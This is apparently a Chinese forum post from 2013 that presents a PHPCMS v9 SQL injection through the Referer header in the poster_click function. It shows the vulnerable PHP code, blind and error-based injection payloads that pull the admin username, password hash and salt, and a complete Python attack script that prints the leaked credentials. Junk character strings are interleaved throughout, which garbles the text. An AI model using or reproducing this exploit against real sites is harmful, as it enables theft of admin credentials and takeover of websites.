有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
, B$ }& c) @- Y% s) ~9 U( c4 d) i" s
" d$ C# m% ]% e问题函数\phpcms\modules\poster\index.php* m% {. h' N, x" j7 x
* D" v1 m2 F( m2 M" R4 r3 Z! A, epublic function poster_click() {
$ s7 K s V6 Q n& R$id = isset($_GET['id']) ? intval($_GET['id']) : 0;8 k# e. {8 W9 D5 |7 Z. n9 x, ^
$r = $this->db->get_one(array('id'=>$id));
9 j% l) U7 y3 }1 n) `1 G! s* bif (!is_array($r) && empty($r)) return false;
6 }/ C M( W3 \2 m7 h' |8 z$ip_area = pc_base::load_sys_class('ip_area');+ A+ }; Q1 D/ j- j* V4 Q4 _
$ip = ip();
+ R- t$ D" _* I. h. l( P$area = $ip_area->get($ip);! i% j8 Y" M) F- I& a
$username = param::get_cookie('username') ? param::get_cookie('username') : '';! ?7 e$ C0 L" k- H* j X
if($id) {
0 H0 n$ d+ J& o3 j5 J$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
2 M! s8 Q3 k$ U6 J' v ]0 Q# i3 F$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
6 G" a( G: F( R3 J}
& \( s$ L; Z$ u4 J( U) T$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
( G- r# t; C, U7 i2 ?$setting = string2array($r['setting']);5 o% Z, b7 X _/ N
if (count($setting)==1) {3 Y) y2 o5 }/ H0 x2 @4 Z3 `
$url = $setting['1']['linkurl'];7 h7 q, ?' S& P4 A, ^! n5 v
} else {
) q+ N8 {, ?9 v- a2 j$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
8 }7 j* z4 C/ W- T: }; q2 ^}
+ Q+ E, Z* `' e6 v2 E* I/ Zheader('Location: '.$url);0 x% J, @- I5 v2 U0 f
}
( {* Z- m# T0 Y) h& m; U; X1 c* |' r$ w9 c
1 ?5 p% B! M' ~# I5 W ~( T i: t8 r6 h% C c
利用方式:1 |) O, b8 x6 a; h: e
- K B$ @+ L7 }; B3 g* c3 Y' ~
1、可以采用盲注入的手法:
[, {$ e9 t& E9 Q) V) Q, e! ~# W0 Y: C N1 r% i' }" G) h
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
' I- T7 c1 B3 k7 A% t( K3 B( j: x4 G8 \% J [9 y( c; L" Y
通过返回页面,正常与否一个个猜解密码字段。
6 k( q D+ `" Q8 g) Q( h6 l
$ k- G8 z- U7 _8 {+ v$ l V2、代码是花开写的,随手附上了:7 r* O; n+ u) J! L; D" P' d
+ Z/ k" l( a3 F1 K2 H& Y; [. A2 [
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#" S f6 h7 e. q) ?& B
w8 y$ q* B. |1 A4 P此方法是爆错注入手法,原理自查。! {$ R* O- A3 q) p8 d
. \/ L4 B6 A6 f# D) v. ~
' o |" B. S9 f% `$ A! K1 V. y- Z9 q9 ~4 Q
利用程序:, B" ?7 E/ h; B! ^
# ~& I! N5 X/ G7 j#!/usr/bin/env python
6 s' ?/ P+ p" k/ uimport httplib,sys,re
9 S% |4 J1 K; Q$ U
7 z, `, E7 X1 T3 rdef attack():
# `4 d7 X8 u9 H( Nprint “Code by Pax.Mac Team conqu3r!”
M# q! }4 N* oprint “Welcome to our zone!!!”# m t5 M! p# b& L9 D, i, ?- d
url=sys.argv[1]
' |1 S y0 a3 R* t. S& l& Y4 W# Jpaths=sys.argv[2]
) c5 c5 _: Z8 R% Jconn = httplib.HTTPConnection(url)
9 k" O8 y/ M. I+ y+ @# si_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,) ^' R$ w, f( |# w
“Accept”: “text/plain”,
w+ k; D7 }* H% a F. ?1 |“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
9 q, G- E: B8 Q& R& ^conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
3 q# i7 M0 B& \, A' I2 i5 ?r1 = conn.getresponse()9 [& s/ B- e6 J# }! {+ g4 m" H
datas=r1.read()- Q' z' o2 v$ l6 P: q
datas=re.findall(r”Duplicate entry \’\w+’”, datas)8 [- \" t+ D4 e
print datas[0]
" b& q# Z8 F1 D- ?conn.close()- N8 L+ ~! m" T, W- b
if __name__==”__main__”:
' q3 k- w9 L6 J9 x, g1 xif len(sys.argv)<3:
) Z: r+ H' X+ I7 q* F, r8 x wprint “Code by Pax.Mac Team conqu3r”9 U( v+ o; M. Q$ C4 `+ V2 ?$ C
print “Usgae:”# F) v, u+ l1 s) W. j; D4 p& D3 g: T
print “ phpcmsattack.py www.paxmac.org /”
) K1 Z" B; S6 W. H; J! aprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”" v4 |+ E4 P7 d: Q2 T
sys.exit(1)
! a" Y4 T3 R/ h! w" Nattack(), _, ~7 l. F7 L' q- |- W: z
5 _2 p7 f: k1 B2 Y0 D) S |
发表于 2013-1-11 21:01:00
收藏
支持
反对